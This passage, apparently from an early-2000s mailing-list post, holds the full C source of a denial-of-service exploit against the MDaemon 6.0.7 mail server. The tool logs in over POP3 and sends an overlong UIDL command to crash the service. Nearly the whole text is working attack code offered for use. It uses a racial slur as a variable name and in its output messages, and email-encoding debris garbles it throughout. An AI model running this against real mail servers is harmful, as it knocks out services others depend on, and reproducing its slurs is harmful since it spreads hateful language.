and crashes MDaemon. http://www.division7.us support@division7.us

Code included and attached=20 d7-mdaemonx.c

START CODE

---snip d7-mdaemonx.c----

* MDaemonX DoS Exploit

* MDaemon is a popular Win32 based, SMTP, POP, IMAP Server

* Crashes MDaemon 6.0.7 < With UIDL Overflow String

* Coded by Division 7 Security Systems

* http://www.division7.us

* pHrail, smurf, elu1d

* support@division7.us

* Tested to work on Redhat8.0 and FreeBSD 4.7-STABLE

* TeKn|CaL j00 were own3d by this, do not DENY!

#include <stdio.h>

#include <stdlib.h>

#include <unistd.h>

#include <errno.h>

#include <string.h>

#include <netdb.h>

#include <sys/types.h>

#include <netinet/in.h>

#include <sys/socket.h>

#define MAXDATASIZE 100 // max number of bytes we can get at once =

void usage(char *program){

printf("[<$>] MDaemon - DOS Attack - Ported for FreeBSD and=20 Linux\n");

printf("[<$>] Coded by division7\n");

printf("[<$>] pHrail, smurfy, elu1d\n");

printf("[<$>] Usage: %s <host> <username> = <password>=20 <port>\n", program);

printf("[<$>] Note: port 110 is default if port is not=20 specified\n");

}

int main(int argc, char *argv[])

{

int sockfd, numbytes, i, port, nigger;

char buf[MAXDATASIZE];

char user[256];

char pass[256];

char uidl[256]=3D"UIDL 11111111111111111111111111111111\n\0";

struct hostent *he;

struct sockaddr_in their_addr; // connector's address information =

if(argc < 4){

usage(argv[0]);

exit(0);

}

if (argv[4] =3D=3D NULL) {

port =3D 110;

} else {

port =3D atoi(argv[4]);

}

if ((he=3Dgethostbyname(argv[1])) =3D=3D NULL) { // get the host info =

perror("gethostbyname");

exit(1);

}

if ((sockfd =3D socket(AF_INET, SOCK_STREAM, 0)) =3D=3D -1) {

perror("socket");

exit(1);

}

their_addr.sin_family =3D AF_INET; // host byte order

their_addr.sin_port =3D htons(port); // short, network byte order =

their_addr.sin_addr =3D *((struct in_addr *)he->h_addr);

memset(&(their_addr.sin_zero), '\0', 8); // zero the rest of the = struct=20

if (connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct = sockaddr)) =3D=3D -1) {

printf("Sorry, cannot connect to %s. Try again...\n", argv[1]);

exit(1);

}

sprintf(user,"USER %s\n",argv[2]);

sprintf(pass,"PASS %s\n",argv[3]);

nigger =3D strlen(pass) - 5;

printf("User: %s\n", argv[2]);

printf("Pass: ");

for(i =3D 1; i < nigger; i++)

{

printf("*");

}

printf("\n");

printf("Host: %s\n", argv[1]);

printf("Port: %lu\n", port);

if ((numbytes=3Drecv(sockfd, buf, MAXDATASIZE-1, 0)) =3D=3D -1) {

perror("recv");

exit(1);

}

buf[numbytes] =3D '\0';

printf("Received: %s",buf);

write(sockfd, user, strlen(user));

if ((numbytes=3Drecv(sockfd, buf, MAXDATASIZE-1, 0)) =3D=3D -1) {

perror("recv");

exit(1);

}

/*memset(buf,'\0',sizeof(buf));*/

buf[numbytes] =3D '\0';

printf("Received: %s",buf);

sleep(1);

write(sockfd, pass, strlen(pass));

if ((numbytes=3Drecv(sockfd, buf, MAXDATASIZE-1, 0)) =3D=3D -1) {

perror("recv");

exit(1);

}

/*memset(buf,'\0',sizeof(buf));*/

buf[numbytes] =3D '\0';

printf("Received: %s",buf);

sleep(1);

printf("Logged In...Now blowing this bitch up...\n");

write(sockfd, uidl, strlen(uidl));

printf("Nigger attack complete...sleeping and exiting...\n");

sleep(5);

close(sockfd);

return 0;

}

---EOF----

��ŷ�� ------=_NextPart_001_01B9_01C282B0.704350F0--